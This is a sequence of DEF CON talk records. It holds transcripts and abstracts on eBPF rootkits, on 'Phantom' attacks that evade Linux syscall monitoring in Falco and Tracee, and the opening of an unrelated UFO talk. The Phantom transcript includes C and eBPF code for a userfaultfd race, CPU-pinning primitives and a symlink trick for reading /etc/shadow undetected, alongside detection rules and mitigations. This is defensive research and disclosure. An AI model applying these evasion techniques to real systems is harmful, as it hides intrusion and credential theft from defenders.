For example, it's not uncommon for malware to perform a series of checks to determine whether it's actually running on a victim machine or in an analysis sandbox such as Cuckoo. The malware will check things such as the number of CPU cores, the machine uptime, the number of files in the temp folder; it might even look at the manufacturer of the network card to determine whether it's a real card or a virtual machine. Thanks to eBPF we can fake the responses to all of these questions — and we can fake them only for the malware, so we don't accidentally break some critical piece of software running inside the sandbox. So now, at the end of this talk, I'm releasing a collection of eBPF programs and loaders that I've called bad-bpf. These programs demonstrate a number of the techniques we've discussed and demonstrated today, and they should have enough documentation and comments to help you understand exactly how they work. They cover a range of actions, from hijacking execve calls to load arbitrary programs, to allowing a user to become root via sudo, to a program that replaces arbitrary text in arbitrary files — and because basically everything in Linux is a file, that can be used to hide kernel modules, add fake users to /etc/passwd, or fake the MAC address reported for a network card. We've covered a lot today, and honestly the internals of eBPF and using eBPF defensively could each be entire talks on their own. But I hope you've at least learnt how kernel rootkits are great for attackers but also incredibly risky, and how eBPF can remove that risk while keeping the same ability to hide data from administrators and provide backdoor access to a machine. And I really hope you've come away with some ideas on how to detect and prevent eBPF rootkits from being deployed, because I think this safety and portability means we're definitely going to start seeing actual eBPF rootkits appear in the wild before too long. There are a lot of links on this page. If you're interested in eBPF, I'd absolutely recommend checking out the community website and Slack — there's a bunch of really cool people on that Slack who are great at helping people learn more about the system and answering any questions people have. There have also been some other offensive eBPF talks in the past, including one just the other day from the Datadog people, so I'd definitely recommend checking those out if you're interested in the offensive side. Finally, I've got some thanks. Thank you very much to Corey for being incredibly supportive as I've delved into the corners of eBPF, and thanks as well for helping me workshop some of the more ridiculous ideas I had when I was designing this talk. And definitely thank you to my family. This recording was done in the middle of a pretty hectic time involving the pandemic and daycare illnesses and all that fun, and I've been very lucky to have a partner supporting me as I ramble into a camera that is many, many, many miles away from DEF CON. Okay, with that I'll end this talk with a picture of my dog. Thanks for watching. I'll be around on the Discord if you have any other questions; otherwise feel free to reach out to me on Twitter, email, GitHub, etc. And thank you for watching.
|
With complete access to a system, Linux kernel rootkits are perfectly placed to hide malicious access and activity. However, running code in the kernel comes with the massive risk that any change to a kernel version or configuration can mean the difference between running successfully and crashing the entire system. This talk will cover how to use extended Berkeley Packet Filters (eBPF) to create kernel rootkits that are safe, stable, stealthy, and portable. eBPF is one of the newest additions to the Linux kernel, designed to easily load safe, constrained, and portable programs into the kernel to observe and make decisions about network traffic, syscalls, and more. But that’s not its only use: by creating eBPF programs that target specific processes we can warp reality, presenting a version of a file to one program and a different version to another, all without altering the real file on disk. This enables techniques such as presenting a backdoor user to ssh while hiding from sysadmins, or smuggling data inside connections from legitimate programs. This talk will also cover how to use these same techniques in malware analysis to fool anti-sandbox checks. These ideas and more are explored in this talk alongside practical methods to detect and prevent this next generation of Linux rootkits. REFERENCES: - DEFCON 27 - Evil eBPF Practical Abuses of In-kernel Bytecode Runtime - A talk about abusing eBPF for exploitation and privilege escalation - eBPF Website - https://ebpf.io - A website by the eBPF community with documentation and links to existing projects - eBPF Slack - https://ebpf.io/slack - A Slack channel run by the eBPF community - Libbpf Bootstrap - https://github.com/libbpf/libbpf-bootstrap - A sample project designed to provide a template to creating eBPF programs with Libbpf
|
10.5446/54228 (DOI)
|
Hello everyone. Today we're going to talk about the Phantom attack: evading system call monitoring. My name is Rex. And my name is Junyuan. So imagine an attacker compromises your Linux infrastructure. The attacker first compromises a web app through remote code execution and then launches a reverse shell. Then he discovers a vulnerability on the system: he can escalate privileges using the sudo vulnerability, CVE-2021-3156. Then he's looking for secrets on the system, so he reads the /etc/shadow file, and then he discovers additional lateral movement opportunities by reading the SSH process environment variables. Then he moves laterally to a second machine using SSH hijacking. As he is celebrating this moment, he discovers that his reverse shell connection is gone, and it doesn't take him too long to discover that his IP is completely blocked. Now let's take a look at the other side of the story. While all this is happening, our security engineer has received a bunch of Slack messages for the alerts generated by his latest cloud workload protection software. The reason that the software can discover all these activities precisely is because it monitors the system calls and other process-related data. So for example, when the attacker launches the reverse shell there will be a connect system call, and there may be additional system calls depending on the reverse shell that he uses. This is similar for the other activities, and throughout this talk we are going to use the openat system call as an example. So let's take a look at how one can use system calls and other process information to detect an attacker reading /etc/shadow. Here's an example rule. The rule is trying to detect untrusted programs reading /etc/shadow. Let me explain what the rule means. It detects that there is an openat or open system call with the read permission, the file name is equal to /etc/shadow, and the program is not in the allow list of programs that are allowed to read /etc/shadow. From this rule it should be very obvious that the ability to precisely monitor system calls and other system call related data is critical for the detection of this attack. The agenda of this talk: we will talk about system call monitoring in more detail, then we'll talk about the two open source system call monitoring projects that we analyzed, then we'll talk about the first vulnerability, the TOCTOU issue, which we exploit with the Phantom v1 attack, then we'll talk about the second vulnerability, a semantic confusion issue, which we exploit with the Phantom v2 attack, and finally we'll conclude the talk with takeaways. With that, I will hand over to Junyuan to talk about system call monitoring. Yeah, so as Rex mentioned, system call monitoring is very important to detect threats. So what is system call monitoring? We can define it as a technique to verify whether an application's system calls conform to rules that specify the program's behaviors at runtime. Here is a graph showing how system call monitoring works. When an application system call is invoked, the system call code path is executed. If there are any hooks in the code path, the attached programs will be called to collect system call data, for example system call arguments. The data are sent to a user space monitoring agent. The monitoring agent will check whether the application's system calls conform to the user-defined rules; if that's not the case, it may generate alerts. So typically at least two steps should be included for system call monitoring.
One step is called system call interception, which is to get notified when target system calls are invoked. In order to intercept system calls you can use tracepoints or raw tracepoints. Both of them are static hooks placed in the kernel code. Raw tracepoints are the eBPF alternative to standard tracepoints. They're faster because they provide raw access to the arguments without processing. For system call interception the kernel provides two raw tracepoints, sys_enter and sys_exit. These raw tracepoints are called from the functions trace_sys_enter and trace_sys_exit respectively. The first argument of these functions is the pt_regs structure, which saves the user registers during the user-to-kernel mode switch and includes the system call arguments. The second parameter is the syscall number. If any programs are attached to these raw tracepoints, they will be executed with the same arguments as these functions. Tracepoints have low overhead but only provide static interception. Different from tracepoints, kprobes and kretprobes provide dynamic hooks in the kernel. Using them we can register programs on kernel instructions, for example on the system call code path. When the instructions are executed, the registered programs are triggered. A kprobe can be inserted on almost any instruction in the kernel; however, a kretprobe can only be inserted at function entry and exit. Kprobes provide dynamic hooks but are slow compared to tracepoints, and you need to know exactly how data is placed on the stack or in registers in order to read system call data. You can also use the LD_PRELOAD trick to intercept system calls, but it doesn't work in all cases, for example when the application is statically compiled. The ptrace system call provides another way to intercept system calls; however, the overhead is high. The second step of system call monitoring is called system call data collection, which is to collect system call data, for example system call arguments, after being notified by system call events. The program used to collect system call data is called a tracing program. For example, you can use a tracing program to collect system call arguments. As we mentioned before, tracing programs can attach to different hooks like tracepoints, raw tracepoints, kprobes, or kretprobes. When the hooks fire, tracing programs are called to collect data. There are different ways to implement tracing programs to collect system call data. You can use Linux native mechanisms like ftrace or perf events. You can also implement the tracing programs in a kernel module or as eBPF programs, which allow the execution of user code in the kernel. The open source projects Falco and Tracee both use similar techniques to monitor syscalls. Falco was originally created by Sysdig. It's one of the two security and compliance projects and the only endpoint security monitoring project among the CNCF incubating projects. It has 3.9k GitHub stars. It consumes kernel events and enriches them with information from the cloud native stack, like Linux containers and so on. Falco supports both eBPF and kernel module implementations for the tracing program. Tracee, on the other hand, was originally created by Aqua Security. It has 1.1k GitHub stars. It's basically a runtime security and forensics tool based on eBPF. So unfortunately these open source projects, and other projects using similar techniques, are vulnerable to attacks on their syscall monitoring. The first vulnerability is time-of-check to time-of-use (TOCTOU). At time of check, tracing programs collect syscall data. At time of use, the syscall data used by the kernel is different from what the tracing program checked.
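To make the collection step concrete, here is a minimal sketch (libbpf/CO-RE toolchain and x86_64 assumed) of a tracing program attached to the sys_enter raw tracepoint that fetches the openat path. Note that it has to read straight from the user-space pointer, which is exactly the read that the TOCTOU issue targets.

    // openat_snoop.bpf.c -- sketch of a sys_enter tracing program (x86_64)
    #include "vmlinux.h"
    #include <bpf/bpf_helpers.h>
    #include <bpf/bpf_core_read.h>

    char LICENSE[] SEC("license") = "GPL";

    SEC("raw_tracepoint/sys_enter")
    int trace_enter(struct bpf_raw_tracepoint_args *ctx)
    {
        struct pt_regs *regs = (struct pt_regs *)ctx->args[0];  /* saved user registers */
        long syscall_id = ctx->args[1];

        if (syscall_id != 257)            /* __NR_openat on x86_64 */
            return 0;

        /* 2nd openat argument lives in %rsi: a pointer into user memory */
        const char *user_path = (const char *)BPF_CORE_READ(regs, si);

        char path[256];
        bpf_probe_read_user_str(path, sizeof(path), user_path);

        /* A real tool would ship this to user space for rule matching;
           bpf_printk is enough for the sketch. */
        bpf_printk("openat(%s)", path);
        return 0;
    }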
Let's take openat as an example. The second parameter is called filename, which is a pointer pointing to a user space buffer. Between the time of check and the time of use, this pointer's target is vulnerable to being modified from user space. So we will introduce the Phantom v1 attack, which exploits this TOCTOU issue. The second vulnerability is semantic confusion. It means the kernel interprets data differently from the tracing programs. For example, a symbolic link is interpreted differently by the kernel and by tracing programs. We will also introduce the Phantom v2 attack, which exploits semantic confusion. We will also demonstrate that Falco is vulnerable to both the Phantom v1 and v2 attacks, while Tracee is only vulnerable to Phantom v1. In order to understand the TOCTOU issue, we use the openat system call as an example. We use kernel version 5.4.0, but regardless of the kernel version, if the monitoring software uses the tracepoints in this way, the TOCTOU vulnerability will exist. To simplify, we only show the code that is related to the attack. When the openat system call is invoked in an application, the syscall handler will execute the trace_sys_enter function with two arguments. As we mentioned before, if any tracing program is attached to this sys_enter tracepoint, the program will be executed. After that, the syscall handler looks up the syscall table and jumps to the openat system call to open the file. Before returning to the application, the handler will call trace_sys_exit with exactly the same arguments as trace_sys_enter. So similarly, if there are any tracing programs attached to the sys_exit tracepoint, they will be executed. As we mentioned before, the second argument of the openat system call is the filename pointer pointing to user space memory. The filename is passed to the do_sys_open function, and the kernel copies it to a kernel buffer, tmp, using the getname function. After that, the kernel uses the kernel buffer to call the internal function do_filp_open to open the file. This is the time of use of the system call arguments by the kernel. If we divide the openat system call code path into two parts based on the getname function, we get two sub code paths, CP1 (code path 1) and CP2 (code path 2). In CP1, the filename pointer hasn't been copied to the kernel buffer yet. In this case, no matter where we place the hook in CP1, the attached tracing program will have to read the user space buffer in order to get the filename. This is vulnerable to being changed by a user space attacker. For example, if we attach a tracing program to the sys_enter tracepoint, or to do_sys_open using a kprobe, during the time of check the tracing program will have to read the user space buffer to get the filename. In CP2, the user space memory has been copied to the kernel buffer, making it not vulnerable to being changed from user space. For example, if we attach a tracing program to the entry of the do_filp_open function using a kprobe, the tracing program can read the kernel buffer tmp to get the filename. That kernel buffer is not vulnerable to being changed by a TOCTOU attack. However, if the hooks are placed improperly in CP2, TOCTOU is still possible. For example, if a tracing program attaches to the sys_exit tracepoint, it will read the user space buffer to get the filename. As we mentioned before, we use kernel version 5.4.0, but regardless of the kernel version, if the monitoring software uses the tracepoints in this way, this vulnerability will exist. Falco is vulnerable to TOCTOU, and the vulnerability is tracked as CVE-2021-33505, with a score of 7.3.
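For contrast, here is a sketch of a CP2-style read: a kprobe at do_filp_open() that reads the filename from the kernel's own copy, so a user-space overwrite after getname() no longer changes what the tracer sees. It assumes libbpf/CO-RE compiled with -D__TARGET_ARCH_x86, and keep in mind that do_filp_open() is a kernel-internal function whose signature can change between versions.

    // cp2_read.bpf.c -- sketch: read the path from the kernel's own copy
    #include "vmlinux.h"
    #include <bpf/bpf_helpers.h>
    #include <bpf/bpf_core_read.h>
    #include <bpf/bpf_tracing.h>

    char LICENSE[] SEC("license") = "GPL";

    SEC("kprobe/do_filp_open")
    int BPF_KPROBE(on_do_filp_open, int dfd, struct filename *pathname)
    {
        /* pathname->name points at the buffer getname() already copied in,
           so a later user-space overwrite cannot change what we read here. */
        const char *kname = BPF_CORE_READ(pathname, name);

        char path[256];
        bpf_probe_read_kernel_str(path, sizeof(path), kname);
        bpf_printk("do_filp_open(%s)", path);
        return 0;
    }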
In particular, the vulnerability exists for Falco with versions older than 0.29.0, or open source Sysdig. It also affects some commercial versions based on the open source agent. This was confirmed by the open source maintainers. Please contact the vendor for the affected versions. The reason why Falco is vulnerable to the TOCTOU vulnerability is that it uses the sys_enter and sys_exit tracepoints to intercept system calls. In that case, user space pointers are read directly by the Falco tracing program in both the kernel module and eBPF program implementations. In order to demonstrate the generality of the attack, we evaluated the syscalls in Falco's rules. Please note that we only consider system calls that include user pointers as arguments, like the openat system call. And we found that Falco's monitoring is vulnerable for most of the syscalls we evaluated, except the execve syscall, because Falco doesn't read the user pointers for the execve arguments directly. Instead, it reads the data from a kernel data structure. We also evaluated Tracee 0.4.0 and found that it's vulnerable for many system calls, like the connect system call. One thing I need to mention is that there's no CVE given, because the Tracee team mentioned that TOCTOU attacks on syscall recorders or tracers are a well-known issue and Tracee is no exception, and they also agreed that, since there's no CVE or formal finding, we could talk about it publicly. I will let the audience interpret that. So I will hand over to Rex to explain and demo the Phantom v1 attack. Alright, so the high-level idea to exploit the TOCTOU issue is fairly simple. First of all we want to trigger the target system call with malicious arguments, and we'll let the kernel read the malicious argument and perform the intended malicious action for us. After the kernel reads it, we will override the data structure pointed to by the user space argument pointer with benign data, and at sys_exit the tracing program reads the data structure pointed to by the user space pointer and checks the benign data against the rule, and therefore the rule will not fire. Although the high-level plan is simple, there are a few technical challenges that we need to overcome. The first one is: when does the kernel thread read it, and how can we synchronize the override with the kernel thread's read? Are the race windows big enough for the system calls that we're going to attack? And how do we ensure the tracing program gets the overwritten copy all the time? So before I dive into the step-by-step exploitation, there are a few primitives that we use in the exploit which I want to talk about. The first one is the userfaultfd system call. This system call is designed in a way that a user thread can handle page faults. But page faults are traditionally handled by the kernel. So what was the initial design intention for this? It was designed for memory externalization. In the case where you're running a distributed program, you can run compute nodes and memory nodes. When the compute node needs a particular piece of memory that doesn't exist on the compute node, the kernel triggers a page fault and the user space fault handler is going to reach out to the memory node to get the desired memory. On the other hand, if the compute node has memory pressure, it will send those memory pages back to the memory node. One very important fact about userfaultfd is that once the kernel thread triggers the page fault, the kernel thread is completely paused and waits for the user space program to respond.
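Here is a minimal userfaultfd sketch in C (error handling omitted; note that on newer kernels unprivileged use may be restricted by the vm.unprivileged_userfaultfd sysctl). It registers a page so that the first access pauses the faulting thread, which may be executing in the kernel inside copy_from_user(), until this process resolves the fault with UFFDIO_COPY. That pause is the primitive the exploit relies on.

    #include <fcntl.h>
    #include <linux/userfaultfd.h>
    #include <string.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    static long page_size;

    /* Register one page with userfaultfd; the page must come from mmap()
       and must not have been touched yet. */
    int setup_uffd(void *region)
    {
        page_size = sysconf(_SC_PAGESIZE);
        int uffd = syscall(SYS_userfaultfd, O_CLOEXEC);

        struct uffdio_api api = { .api = UFFD_API, .features = 0 };
        ioctl(uffd, UFFDIO_API, &api);

        struct uffdio_register reg = {
            .range = { .start = (unsigned long)region, .len = page_size },
            .mode  = UFFDIO_REGISTER_MODE_MISSING,
        };
        ioctl(uffd, UFFDIO_REGISTER, &reg);
        return uffd;
    }

    /* Block until the first fault on the region, then resolve it with a page
       containing 'payload' (for example, the malicious path). The faulting
       thread stays paused until the UFFDIO_COPY below completes. */
    void handle_one_fault(int uffd, void *region, const char *payload)
    {
        struct uffd_msg msg;
        read(uffd, &msg, sizeof(msg));            /* blocks until a fault arrives */
        if (msg.event != UFFD_EVENT_PAGEFAULT)
            return;

        char *staging = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        strcpy(staging, payload);

        struct uffdio_copy cp = {
            .dst = (unsigned long)region,
            .src = (unsigned long)staging,
            .len = page_size,
            .mode = 0,
        };
        ioctl(uffd, UFFDIO_COPY, &cp);            /* wakes the paused thread */
    }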
As some of you may already be aware, this has been used quite a bit in exploiting kernel race condition bugs. The other two primitives I want to talk about are interrupts and scheduling. An interrupt notifies the processor of an event that requires immediate attention. It will divert the program control flow to an interrupt handler. Let's look at the picture on the right side. We have two cores and two tasks, one running on each core. On core zero, task A issues a system call, and then the control flow transfers to the kernel thread to handle the system call. While it is running, the user thread on core one triggers an interrupt, and the way it triggers the interrupt is indirectly, using a system call. Once the interrupt is triggered, core zero will execute the interrupt handler, and after the interrupt is handled it will return back to the system call routine which handles the system call. So there are different ways to indirectly trigger an interrupt using a system call. One way to do it is to trigger a hardware interrupt. This can happen when a program issues a connect system call: the CPU that is dedicated to handling the networking interrupt will get interrupted. Another way to trigger an interrupt is called an inter-processor interrupt. This can be done by issuing an mprotect system call. Once the mprotect system call is issued, the memory page permission is changed, and therefore all the CPUs that are caching those memory permissions need to be updated with the right memory permission. For the scheduling primitives that we use, one is sched_setscheduler. This will change the scheduling priority of a particular task. This is optional in the exploit, because for system calls with longer TOCTOU windows, such as networking system calls, we find that it's not needed to reliably exploit the TOCTOU issue. But with system calls related to files, the TOCTOU window is typically smaller, and with that capability we can 100% reliably exploit the TOCTOU issue. And the second primitive we use is sched_setaffinity, which will pin a task to a particular CPU. Okay, so let me talk about the step-by-step exploitation in detail. Initially we need to do some setup. We set up three threads: a main thread, a userfaultfd thread (the userfaultfd thread can run on any CPU), and also an override thread. The main thread will be pinned to CPU 3. The choice of 3 here is because we ran one of our experiments on a four-core system and CPU 3 is used to handle the networking interrupt. But if you're using the IPI interrupt, it can be any CPU. Then the main thread will map a memory page, page A. The page is not allocated, and the main thread registers it so that the userfaultfd thread handles the page fault generated for this page. On the override thread side, we pin it to a different CPU because we want to reduce the interference between the override thread and the main thread. And then the override thread will just block on a condition variable once it has started. After this setup, the main thread will trigger a system call, in this case openat, and it will specify the filename argument to point to page A. Now keep in mind that page A at this point is not allocated, and so the kernel thread will trigger a page fault. Once the page fault is triggered, the userfaultfd thread will write page A with the malicious filename and then it will release the condition variable. And then it will issue an ioctl system call to return execution back to the kernel.
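The pinning, priority, and indirect-interrupt primitives just described boil down to a few lines of user-space C. This is only a sketch: exact behaviour is scheduler- and architecture-dependent, and only the priority bump requires CAP_SYS_NICE (or a suitable rlimit).

    #define _GNU_SOURCE
    #include <sched.h>
    #include <stddef.h>
    #include <sys/mman.h>
    #include <sys/resource.h>

    void pin_to_cpu(int cpu)                       /* sched_setaffinity primitive */
    {
        cpu_set_t set;
        CPU_ZERO(&set);
        CPU_SET(cpu, &set);
        sched_setaffinity(0, sizeof(set), &set);
    }

    void boost_priority(void)                      /* needs CAP_SYS_NICE */
    {
        setpriority(PRIO_PROCESS, 0, -20);
    }

    void nudge_ipi(void *page, size_t len)         /* indirect inter-processor interrupt */
    {
        /* Flipping permissions on a mapped, page-aligned region forces other
           CPUs caching the mapping to be interrupted for a TLB shootdown. */
        mprotect(page, len, PROT_READ);
        mprotect(page, len, PROT_READ | PROT_WRITE);
    }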
Now, once the condition variable is released, the override thread will start running, and it will first write the benign filename. In the last stage of this attack, once execution returns back to the kernel, the kernel will use copy_from_user and it will get the malicious path name. This is the time of use. And it keeps executing until, at sys_exit, the tracing program reads the registers and dereferences the filename value again. This is the time of check. So this is the TOCTOU window we have, and let's see how we can use the override thread to make this override successful. After it writes the benign name, we issue a memory consistency update using CPU instructions. As the memory consistency update takes place, we want to increase the TOCTOU window such that we have enough time to update the value for all the CPUs. So what we do is issue an interrupt using system calls, and this will increase the TOCTOU window size. And then the memory consistency update applies. So the filename now points to the benign filename, and then the tracing program will read out the benign filename and check it against the rule, which will not fire anything. Now let's take a look at the demo. Okay, so in our first demo we're going to attack Sysdig, using the connect system call as an example. What we'll do is run Sysdig and ask it to monitor the connect system call, and just filter the data on our attack program. Then in another window we will use tcpdump to monitor all traffic going to port 80. And then we'll run our attack program. The attack program will connect to 1.1.1.1, but then it will override this IP address with an IP address from linkedin.com. Okay, so we can see that tcpdump reports traffic actually going to 1.1.1.1. This is what happens on the wire. But Sysdig will report that this attack program is actually connecting to 13.107.42.14, which is the IP address owned by linkedin.com. And therefore we showed that we can overwrite this with an arbitrary value. Okay, so now we'll show a second demo. In this demo we'll show an attack on Sysdig on the openat system call. Now our demo setup is slightly different. For openat the TOCTOU window is small, so if we don't use CAP_SYS_NICE, sometimes the attack will fail. But if we assign CAP_SYS_NICE we can achieve 100% reliable exploitation. Keep in mind that because the override thread has the highest scheduling priority, sometimes it can write the filename faster than the kernel reads it. When that happens, the system call will get the benign filename and Sysdig will also get the benign filename. So there's no harm being done and no alert being fired either. Therefore we ran the experiment 15 times using our script, and each time we checked what the syscall got and what Sysdig read, and we computed the result based on each observation. What we'll do is print out the number of successful attacks, the number of attempts where no harm was done, and also the success rate. Okay, so as you can see here, in the 15 experiments we succeeded three times, had no failures, and 12 times there was no harm. And therefore the success rate is 100%. Okay, so lastly we'll show a demo on Tracee as well, and here we will attack the connect call in Tracee. The attack setup is very similar to what we have for Sysdig. Again, Tracee will monitor the connect system call and we'll just filter the data on our attack program reported by Tracee. And then we have tcpdump monitoring port 80, and then we run the attack.
As you can see, the actual traffic going on the wire is going to 1.1.1.1, but Tracee reported that the traffic is going to 13.107.42.14, which was overwritten by us. Okay, so I just want to reiterate that CAP_SYS_NICE is optional; it depends on the system call that you're attacking, and for networking system calls it is typically not needed, while for file-based system calls it is typically needed to achieve one hundred percent reliable exploitation. And then I'll talk about the second attack, the semantic confusion. The idea of the attack is fairly simple. The kernel and the tracing program can interpret data differently. We use a file link as an example. When the kernel reads a link, it will try to resolve the link and read the actual file. But when the tracing program reads a link, it will just take the link as the argument and use that to check against the rule. So Falco is vulnerable to this semantic confusion attack because it doesn't resolve the link in the system call. There's no CVE given because they mentioned that symlink and symlinkat, link and linkat are all monitored by Falco. But practically, detection teams need to add all these symlink/symlinkat and link/linkat events to all these file-based rules if the attacker is using those. And Tracee is not vulnerable to this attack because they use a mitigation in an LSM hook, which Junyuan will talk about more in a later slide. So I just want to quickly show the example of the Phantom v2 attack on Sysdig. Remember the rule that we talked about at the very beginning: we check whether the file name is /etc/shadow. In order to exploit this, we can create a symlink /tmp/shadow pointing to /etc/shadow. The kernel will resolve the symlink and read /etc/shadow, while the tracing program for the openat system call sees /tmp/shadow and checks it against the rule. It doesn't match /etc/shadow, and therefore the rule is bypassed. So with that, I will hand over back to Junyuan to talk about mitigations. Yeah, so for mitigations there are basically two approaches for the Phantom attacks. One is to detect that a potential exploit is happening. This was proposed and partially implemented by the Falco team, and it is included in the Falco release version 0.29.0. Basically it's trying to detect the following behaviors used by the exploits: for example, it detects the previous use of the userfaultfd system call. It also detects a user registering a memory address range, and a user copying a contiguous memory chunk into a userfaultfd-registered range, and so on. The second way to mitigate Phantom attacks is to read the data that is actually used by the system call, or by the kernel. In order to do that, you can hook LSM functions to get the system call data that is actually used. LSM hook functions are a list of checkpoints that are placed in the kernel before operations happen on kernel objects. So here is a table showing a list of the LSM hooks used by Tracee 0.4.0, and the second column shows the system calls that are protected from Phantom attacks by the LSM hooks. You can also read the data that's used by the kernel from kernel data structures. For example, in order to read the arguments of execve, tracing programs can read them from the mm_struct in the kernel. I will hand over back to Rex to conclude. Okay, so basically in this talk we showed that the Phantom attack is generic and it exploits the fact that the kernel and the tracing program can read data at different times.
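For reference, the Phantom v2 symlink trick described above is literally this small. This is a sketch; it assumes the attacker already has the privileges to read the target file, as in the scenario at the start of the talk.

    #include <fcntl.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        symlink("/etc/shadow", "/tmp/shadow");      /* link -> real target */

        /* The kernel resolves the link and opens /etc/shadow; a tracer that
           only looks at the raw openat() argument sees "/tmp/shadow". */
        int fd = openat(AT_FDCWD, "/tmp/shadow", O_RDONLY);
        if (fd >= 0) {
            char buf[128];
            ssize_t n = read(fd, buf, sizeof(buf));
            printf("read %zd bytes\n", n);
            close(fd);
        }
        return 0;
    }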
This is exploited by Phantom v1. We also showed that the Phantom attack can exploit the fact that the kernel and the tracing program can interpret data differently. This is exploited by Phantom v2. We demonstrated that the kernel raw tracepoints on system calls are not ideal for secure tracing, and other tracing implementations, such as kprobes, could also be vulnerable if they are not implemented properly. For mitigation, one can use detection of abnormal usage of userfaultfd, or ensure that the kernel and the secure tracing program read the same data and interpret the data in the same way. If you're interested in discussing this further, feel free to contact me on Twitter, and we'll share the GitHub link on Twitter as well. So before we conclude, we also want to thank all the people who helped during our research: Chris and Joe for the discussions on eBPF, kernel tracing, and TOCTOU, and also You on TOCTOU, and lastly we really appreciate the Falco open source team; they were very professional in handling the issue and we had really good discussions with them. Thank you everyone.
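For readers who want to see what the LSM-hook mitigation mentioned above can look like, here is a minimal eBPF sketch. It assumes a kernel built with CONFIG_BPF_LSM and the bpf LSM enabled, plus a libbpf/CO-RE toolchain; it reads the path from the struct file the kernel is actually about to open, after symlink resolution and with no user-space pointer left to race.

    // lsm_open.bpf.c -- sketch of collecting the opened path at the LSM layer
    #include "vmlinux.h"
    #include <bpf/bpf_helpers.h>
    #include <bpf/bpf_tracing.h>

    char LICENSE[] SEC("license") = "GPL";

    SEC("lsm/file_open")
    int BPF_PROG(audit_file_open, struct file *file)
    {
        char path[256];

        /* bpf_d_path() renders the path of the file the kernel will open. */
        bpf_d_path(&file->f_path, path, sizeof(path));
        bpf_printk("file_open: %s", path);

        return 0;   /* 0 allows the open; a negative errno (e.g. -EPERM) would deny it */
    }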
|
Phantom attack is a collection of attacks that evade Linux system call monitoring. A user mode program does not need any special privileges or capabilities to reliably evade system call monitoring using Phantom attack by exploiting insecure tracing implementations. After adversaries gain an initial foothold on a Linux system, they typically perform post-exploitation activities such as reconnaissance, execution, privilege escalation, persistence, etc. It is extremely difficult if not impossible to perform any non-trivial adversarial activities without using Linux system calls. Security monitoring solutions on Linux endpoints typically offer system call monitoring to effectively detect attacks. Modern solutions often use either ebpf-based programs or kernel modules to monitor system calls through tracepoint and/or kprobe. Any adversary operations including abnormal and/or suspicious system calls reveal additional information to the defenders and can trigger detection alerts. We will explain the generic nature of the vulnerabilities exploited by Phantom attack. We will demonstrate Phantom attack on two popular open source Linux system call monitoring solutions Falco (Sysdig) and Tracee (Aquasecurity). We will also explain the differences between Phantom v1 and v2 attacks. Finally, we will discuss mitigations for Phantom attack and secure tracing in the broader context beyond system call tracing. REFERENCES: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33505 https://i.blackhat.com/USA-20/Thursday/us-20-Lee-Exploiting-Kernel-Races-Through-Taming-Thread-Interleaving.pdf https://www.youtube.com/watch?v=MIJL5wLUtKE https://dl.packetstormsecurity.net/1005-advisories/khobe-earthquake.pdf
|
10.5446/54230 (DOI)
|
Hello again. This is Richard Thieme, showing up 25 years after I showed up to speak here at DEF CON for the first time, to address the topic of UFOs: misinformation, disinformation, and the basic truth. A lot has been happening since I gave a talk about this subject eight years ago, which is on YouTube, and I'll refer to that subsequently. But I want to say that reality, as Philip K. Dick said, will not go away just because we refuse to believe in it. And what is happening right now is real. In fact, it's been real for a long time. So, given all the hullabaloo about UAPs, as we now call UFOs, what is happening? Well, for one thing, those videos are happening. And I'm not going to show them to you again, because you've seen them. They're widely available on the Internet. You've seen the Tic Tacs, and you've seen the videos from the 2004 Nimitz incident, and you've probably seen that object going in and out of the water on its way from U.S. territorial waters toward Cuba. Those are all very interesting and all over the web. So those videos, and what they're getting people to say and think about, are happening. And officials commented on them positively in public, which is a near first. So that's happening too. They're not making jokes about little green men or conspiracy theories, eh? In addition, Luis Elizondo and his narrative is happening. And he's telling the world that he left the UAP task force so he could bring his knowledge, his concerns, into public debate. Now, this is where I would be showing you my second slide, which is a picture of Luis Elizondo. And no matter what we did and how many hours we spent, we could not get slides to insert themselves into this video using the software we had to use. So the slides that accompany this will be available on the DEF CON server, as well as at my website, which is thiemeworks.com, T-H-I-E-M-E-W-O-R-K-S dot com. And you can go there and see them. Now, I'll also send them to you by email in PDF, PowerPoint, or Keynote, if you like. Now, what is Luis Elizondo saying? Well, he said to me a couple of years ago in a conversation that the conversation about UAPs used to be at the water cooler, low level, and now it is happening at the highest levels of the Pentagon. And I can add that a former member of the Joint Chiefs of Staff confirmed that UFOs are real and have been observed and documented for a long time. Okay, so what's happening is UFOs are real. But those of us who have investigated this seriously and robustly and diligently and skeptically have known that that's been true for the last 70 years. But this time, the authoritative voice, if you will: 60 Minutes, the New York Times, CNN, The Washington Post, The New Yorker, several senators, the head of NASA, they all constitute the quote-unquote authoritative voice. And instead of dismissing or ridiculing the rest of us for reporting what we know, they confirmed that they are real. So this CBS, with 60 Minutes saying those things, is not Walter Cronkite's CBS of decades ago, half a century ago, when he debunked UFOs as not worthy of investigation. And that did happen to be a time when the CIA and CBS and many other major media had secret contracts. So what's happening is that the authoritative voice is confirming that UFOs are real and are a security threat. That brings me to our book, UFOs and Government: A Historical Inquiry, to which I'll refer again, because it's the gold standard for historical research into the subject.
And we document, from the 40s to the 80s, using their own words, that the government considered UFOs a security threat and investigated what they might be on that basis. So what else has been observed, according to Elizondo? Well, that there have been many more documented sightings than the videos you have seen and the hundred-and-some-odd incidents to which they refer: many, many more documented sightings over the past 70 years. And he also affirmed that they enter and leave the atmosphere and travel with equal ease, whether in space or in the air or underwater. And that the propulsion system, which we really shouldn't call a propulsion system because it doesn't seem to propel, is a means of translation, as it were, from one vector of space-time to another. And the velocities they achieve and their aerodynamics are still pretty much beyond our understanding and capabilities. Although I believe, and that's a belief, not knowledge, that we are doing and have been doing everything we can to learn how to do that. Well, often when you observe UFOs, there's what we could call a warp snap. They blur. They don't simply go fast. They blur and go out of sight, or out of our space-time frame entirely, or into a different dimensional reality. Or they could be going so fast from one point to another, without the impacts of gravity, that they cannot be detected in motion by the eye or sensors. But our sensors are doing a good job of detecting them in other ways. The only alternative explanation in 1948 was that they were extraterrestrial, if they weren't Russian and they weren't ours. Now we can add multi-dimensional and time travel, which, if I have time, I'll refer to. And so you know what I mean. So don't think of how things fly in the atmosphere. They don't fly. They don't action-reaction, propel one way and move another. They move in inexplicable ways. And often pilots report they seem to simply vanish. They are right in front of them in the air and simply disappear. So if they're not ours and 